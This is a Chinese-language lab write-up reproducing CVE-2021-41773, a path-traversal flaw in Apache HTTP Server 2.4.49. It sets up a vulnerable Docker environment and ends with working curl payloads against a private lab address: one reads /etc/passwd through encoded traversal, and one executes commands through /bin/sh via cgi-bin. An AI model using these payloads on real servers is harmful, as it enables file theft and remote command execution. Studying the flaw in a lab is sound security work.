CVE-2021-41773复现

ca5tle

2021-10-07 (Updated: 2021-11-24)

漏洞复现

0x00 前言

Apache HTTP Server 2.4.49 版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到 Web 目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。

0x01 影响版本

1	Apache HTTP Server 2.4.49

前置条件

穿越目录运行被访问。比如配置了

1	<Directory />Require all granted</Directory>

0x02 环境搭建

Dockerfile

FROM vulhub/httpd:2.4.49

RUN set -ex \
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
    && cat /usr/local/apache2/conf/httpd.conf \
        | tr '\n' '\r' \
        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
        | tr '\r' '\n' \
        | tee /tmp/httpd.conf \
&& mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

执行如下命令启动环境

1 2	docker build -t cve-2021-41773 . docker run -d -p 80:80 5f453ed6f9a4

进入容器修改Apache配置

1	docker exec -it 5977a2464108 bash

修改配置文件httpd.conf

apt-get update
apt install vim
vim conf/httpd.conf

内容如下：
<Directory />
    Require all granted
</Directory>

重启容器

1	docker restart 5977a2464108

0x03 漏洞复现

文件读取

1	curl -v --path-as-is http://10.108.2.145/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

命令执行

1 2	curl --data "echo;id" 'http://10.108.2.145/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' # Linux curl --data "echo;id" "http://10.108.2.145/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" # Windows